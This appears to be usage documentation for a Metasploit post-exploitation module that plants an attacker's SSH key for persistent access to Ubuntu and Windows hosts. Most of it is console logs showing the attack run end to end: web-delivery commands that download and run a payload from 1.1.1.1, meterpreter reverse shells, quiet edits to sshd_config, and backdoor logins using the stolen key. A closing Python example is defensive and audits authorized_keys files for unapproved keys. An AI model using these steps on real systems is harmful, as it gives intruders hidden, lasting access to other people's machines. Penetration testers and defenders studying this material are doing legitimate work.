## Description

This module will add an SSH key to a specified user (or all), to allow remote login on the victim via SSH at any time.

This module has been tested against:

1. Ubuntu 24.04
2. Windows 10

### Creating A Testing Environment

#### Windows

[Instructions](https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell&pivots=windows-10)

```
Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0
(Get-Content "$env:ProgramData\ssh\sshd_config") -replace '^\s*#\s*(PubkeyAuthentication\s+.*)', '$1' | Set-Content "$env:ProgramData\ssh\sshd_config"
Set-Service -Name sshd -StartupType Automatic
Start-Service -Name sshd
```

##### Testing Notes

Windows was difficult to test. The `PubkeyAuthentication` field seems to default to `yes` even when commented out.

For logins,

```
Match Group administrators
       AuthorizedKeysFile __PROGRAMDATA__/ssh/administrators_authorized_keys
```

is the default (as of 1809?). When this is in place, user `authorized_keys` are ignored, and only the `administrators_authorized_keys` is checked.
When this is commented out, only user's `authorized_keys` are checked (as expected).

## Verification Steps

1. Start msfconsole
2. Exploit a box via whatever method
3. Do: `use exploit/multi/persistence/ssh_key`
4. Do: `set session #`
5. Optional Do: `set username`
6. Do: `set verbose true`
7. Do: `exploit`

## Options

### SSHD_CONFIG

Location of the sshd_config file on the remote system. We use this to determine if the authorized_keys file location has changed on the system. If it hasn't, we default to `.ssh/authorized_keys`.

### USERNAME

If set, we only write our key to this user. If not, we'll write to all users. On Windows, setting `admin` or `administrator` will force writing to the Admin's `authorized_keys`.

### PUBKEY

Path to a public key to use. If not provided, a pub/priv key pair is generated automatically.

### CREATESSHFOLDER

If no .ssh folder is found, create it for the target user.
Defaults to `false`.

## Scenarios

### Ubuntu 24.04

Get original shell

```
[*] Processing /root/.msf4/msfconsole.rc for ERB directives.
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set srvport 8082
srvport => 8082
resource (/root/.msf4/msfconsole.rc)> set uripath l
uripath => l
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4446
lport => 4446
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4446
[*] Using URL: http://1.1.1.1:8082/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO 7kQHbL1b --no-check-certificate http://1.1.1.1:8082/l; chmod +x 7kQHbL1b; ./7kQHbL1b& disown
msf exploit(multi/script/web_delivery) >
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 2.2.2.2:40288) at 2025-12-15 20:18:05 -0500
```

Persistence install

```
msf exploit(multi/script/web_delivery) > use exploit/multi/persistence/ssh_key
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/persistence/ssh_key) > set session 1
session => 1
msf exploit(multi/persistence/ssh_key) > exploit
[*] Command to run on remote host: curl -so ./yGgUYcAsWEy http://1.1.1.1:8080/t70WmtC4mNeBieRpZqn09Q;chmod +x ./yGgUYcAsWEy;./yGgUYcAsWEy&
[*] Exploit running as background job 1.
msf exploit(multi/persistence/ssh_key) >
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking SSH Permissions
[+] The target appears to be vulnerable. Likely vulnerable
[!] Payload handler is disabled, the persistence will be installed only.
[*] Determining authorized_keys file
[*] Authorized Keys File: .ssh/authorized_keys
[*] Found 25 potential user folders
[!] No .ssh folder found for //.ssh, skipping...
[!] No //.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /bin/.ssh, skipping...
[!] No /bin/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /dev/.ssh, skipping...
[!] No /dev/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /nonexistent/.ssh, skipping...
[!] No /nonexistent/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /root/.ssh, skipping...
[!] No /root/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /run/ircd/.ssh, skipping...
[!] No /run/ircd/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /run/sshd/.ssh, skipping...
[!] No /run/sshd/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /run/uuidd/.ssh, skipping...
[!] No /run/uuidd/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /usr/games/.ssh, skipping...
[!] No /usr/games/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /usr/lib/dhcpcd/.ssh, skipping...
[!] No /usr/lib/dhcpcd/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /usr/sbin/.ssh, skipping...
[!] No /usr/sbin/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/backups/.ssh, skipping...
[!] No /var/backups/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/cache/man/.ssh, skipping...
[!] No /var/cache/man/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/cache/pollinate/.ssh, skipping...
[!] No /var/cache/pollinate/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/lib/fwupd/.ssh, skipping...
[!] No /var/lib/fwupd/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/lib/landscape/.ssh, skipping...
[!] No /var/lib/landscape/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/lib/tpm/.ssh, skipping...
[!] No /var/lib/tpm/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/lib/usbmux/.ssh, skipping...
[!] No /var/lib/usbmux/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/list/.ssh, skipping...
[!] No /var/list/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/mail/.ssh, skipping...
[!] No /var/mail/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/spool/lpd/.ssh, skipping...
[!] No /var/spool/lpd/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/spool/news/.ssh, skipping...
[!] No /var/spool/news/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/spool/uucp/.ssh, skipping...
[!] No /var/spool/uucp/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/www/.ssh, skipping...
[!] No /var/www/.ssh/authorized_keys file found, skipping...
[*] Found 1 confirmed user folders
[+] Storing new private key as /root/.msf4/loot/20251215201840_default_2.2.2.2_id_rsa_950788.txt
[*] Adding key to /home/ubuntu/.ssh/authorized_keys
[+] Persistence installed! Call a shell using 'ssh -i /root/.msf4/loot/20251215201840_default_2.2.2.2_id_rsa_950788.txt @2.2.2.2'
[+]   use auxiliary/scanner/ssh/ssh_login
[+]   run KEY_PATH=/root/.msf4/loot/20251215201840_default_2.2.2.2_id_rsa_950788.txt RHOSTS=2.2.2.2 USERNAME=
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/2.2.2.2_20251215.1841/2.2.2.2_20251215.1841.rc
```

Trigger via metasploit

```
msf exploit(multi/persistence/ssh_key) > use auxiliary/scanner/ssh/ssh_login
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf auxiliary(scanner/ssh/ssh_login) > run KEY_PATH=/root/.msf4/loot/20251215201840_default_2.2.2.2_id_rsa_950788.txt RHOSTS=2.2.2.2 USERNAME=ubuntu VERBOSE=false
[*] 2.2.2.2:22 - Starting bruteforce
[*] 2.2.2.2:22 SSH - Testing Cleartext Keys
[+] 2.2.2.2:22 - Success: 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),101(lxd) Linux ubuntu2404 6.8.0-31-generic #31-Ubuntu SMP PREEMPT_DYNAMIC Sat Apr 20 00:40:06 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux '
[*] SSH session 2 opened (1.1.1.1:40385 -> 2.2.2.2:22) at 2025-12-15 20:21:13 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

Manually trigger

```
msf auxiliary(scanner/ssh/ssh_login) > chmod 600 /root/.msf4/loot/20251215201840_default_2.2.2.2_id_rsa_950788.txt
[*] exec: chmod 600 /root/.msf4/loot/20251215201840_default_2.2.2.2_id_rsa_950788.txt

msf auxiliary(scanner/ssh/ssh_login) > ssh -i /root/.msf4/loot/20251215201840_default_2.2.2.2_id_rsa_950788.txt ubuntu@2.2.2.2
[*] exec: ssh -i /root/.msf4/loot/20251215201840_default_2.2.2.2_id_rsa_950788.txt ubuntu@2.2.2.2

Welcome to Ubuntu 24.04 LTS (GNU/Linux 6.8.0-31-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Tue Dec 16 01:21:12 AM UTC 2025

  System load:  0.08               Processes:               220
  Usage of /:   27.3% of 23.45GB   Users logged in:         1
  Memory usage: 5%                 IPv4 address for ens160: 2.2.2.2
  Swap usage:   0%

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Dec 16 01:09:33 2025 from 1.1.1.1
ubuntu@ubuntu2404:~$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),101(lxd)
ubuntu@ubuntu2404:~$ exit
logout
Connection to 2.2.2.2 closed.
msf auxiliary(scanner/ssh/ssh_login) >
```

### Windows 10

Fresh install of SSH, followed the instructions included in these docs.

```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe
[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) >
[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:59009) at 2025-12-19 17:04:57 -0500

msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/multi/persistence/ssh_key
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/persistence/ssh_key) > set session 1
session => 1
msf exploit(multi/persistence/ssh_key) > set CREATESSHFOLDER true
CREATESSHFOLDER => true
msf exploit(multi/persistence/ssh_key) > set username admin
username => admin
msf exploit(multi/persistence/ssh_key) > exploit
stty: 'standard input': unable to perform all requested operations
[*] Command to run on remote host: curl -so ./jCmJxTXYN http://1.1.1.1:8080/t70WmtC4mNeBieRpZqn09Q;chmod +x ./jCmJxTXYN;./jCmJxTXYN&
[*] Exploit running as background job 1.
msf exploit(multi/persistence/ssh_key) >
msf exploit(multi/persistence/ssh_key) >
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking SSH Permissions
[-] Pubkey Authentication disabled
[*] Attempting to enable pubkey authentication in sshd_config
[+] PubkeyAuthentication enabled successfully
[+] The target appears to be vulnerable. Likely vulnerable
[!] Payload handler is disabled, the persistence will be installed only.
[*] Determining authorized_keys file
[*] Found 1 potential user folders
[*] Found 1 confirmed user folders
[+] Storing new private key as /root/.msf4/loot/20251219171407_default_2.2.2.2_id_rsa_295084.txt
[*] Adding key to C:\ProgramData\ssh\administrators_authorized_keys
[+] Persistence installed! Call a shell using 'ssh -i /root/.msf4/loot/20251219171407_default_2.2.2.2_id_rsa_295084.txt @2.2.2.2'
[+]   use auxiliary/scanner/ssh/ssh_login
[+]   run KEY_PATH=/root/.msf4/loot/20251219171407_default_2.2.2.2_id_rsa_295084.txt RHOSTS=2.2.2.2 USERNAME=
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251219.1408/WIN10PROLICENSE_20251219.1408.rc

msf exploit(multi/persistence/ssh_key) > use auxiliary/scanner/ssh/ssh_login
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf auxiliary(scanner/ssh/ssh_login) > run KEY_PATH=/root/.msf4/loot/20251219171407_default_2.2.2.2_id_rsa_295084.txt RHOSTS=2.2.2.2 USERNAME=windows
[*] 2.2.2.2:22 - Starting bruteforce
[*] 2.2.2.2:22 SSH - Testing Cleartext Keys
[*] Testing 1 key from /root/.msf4/loot/20251219171407_default_2.2.2.2_id_rsa_295084.txt
[+] 2.2.2.2:22 - Success: 'Microsoft Windows 10 Pro 10.0.18363 N/A Build 18363'
[+] 2.2.2.2:22 - windows:-----BEGIN RSA PRIVATE KEY-----
[private key body omitted]
-----END RSA PRIVATE KEY-----
', ' ')}'
[*] SSH session 2 opened (1.1.1.1:33749 -> 2.2.2.2:22) at 2025-12-19 17:14:39 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/ssh_login) > sessions -i 2
[*] Starting interaction with 2...

Microsoft Windows [Version 10.0.18363.2274]
(c) 2019 Microsoft Corporation. All rights reserved.

windows@WIN10PROLICENSE C:\Users\windows>
windows@WIN10PROLICENSE C:\Users\windows>whoami
whoami
win10prolicense\windows
```
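
For the defender's side of the Testing Notes and the `SSHD_CONFIG` option, the Python below is an added example (not part of the module or of Metasploit): it resolves which `authorized_keys` file sshd consults for a user, including the `Match Group administrators` override, and lists keys whose fingerprint is not in an approved baseline. The sample config, key blobs, comments, baseline and all function names are constructed for illustration.

```python
import base64
import hashlib

# Constructed sample modelled on the Windows default quoted in the Testing Notes.
SAMPLE_CONFIG = """#PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys
Match Group administrators
       AuthorizedKeysFile __PROGRAMDATA__/ssh/administrators_authorized_keys
"""

def authorized_keys_rules(config_text):
    """Return (global_paths, {group: paths}) from AuthorizedKeysFile lines."""
    global_paths, by_group, groups = None, {}, None
    for words in (line.split() for line in config_text.splitlines()):
        # A commented-out directive ("#Match ...") never equals a keyword.
        keyword = words[0].lower() if words else ""
        if keyword == "match":
            # Only "Match Group a,b" is modelled; other criteria are skipped.
            is_group = len(words) == 3 and words[1].lower() == "group"
            groups = words[2].lower().split(",") if is_group else []
        elif keyword == "authorizedkeysfile" and groups is None:
            global_paths = global_paths or words[1:]  # first value wins
        elif keyword == "authorizedkeysfile":
            for group in groups:
                by_group.setdefault(group, words[1:])
    # Fallback is the default named under the SSHD_CONFIG option.
    return global_paths or [".ssh/authorized_keys"], by_group

def files_sshd_reads(rules, user_groups):
    """Paths consulted for a user in user_groups (names are case-folded)."""
    global_paths, by_group = rules
    hits = [by_group[g.lower()] for g in user_groups if g.lower() in by_group]
    return hits[0] if hits else global_paths

def fingerprints(authorized_keys_text):
    """Yield (SHA256 fingerprint, comment) per key line, skipping options."""
    lines = authorized_keys_text.splitlines()
    for line in (l for l in lines if not l.lstrip().startswith("#")):
        tokens = line.split()
        for i, tok in enumerate(tokens[:-1]):
            if tok.startswith(("ssh-", "ecdsa-", "sk-")):
                digest = hashlib.sha256(base64.b64decode(tokens[i + 1])).digest()
                fp = "SHA256:" + base64.b64encode(digest).decode().rstrip("=")
                yield fp, " ".join(tokens[i + 2:])
                break

def unapproved_keys(authorized_keys_text, approved):
    return [(fp, c) for fp, c in fingerprints(authorized_keys_text) if fp not in approved]

def sample_line(blob, comment):  # constructed blob, not a real public key
    return "ssh-ed25519 " + base64.b64encode(blob).decode() + " " + comment

KNOWN = sample_line(b"constructed-ops-key", "ops@jumpbox")
SAMPLE_KEYS = KNOWN + "\n" + sample_line(b"constructed-other-key", "")
APPROVED = {fp for fp, _ in fingerprints(KNOWN)}
```

Feed `files_sshd_reads` the real `sshd_config` and group membership, then run `unapproved_keys` over each returned file; on Windows this means an administrator's per-user file can look clean while the entry that matters sits in `administrators_authorized_keys`.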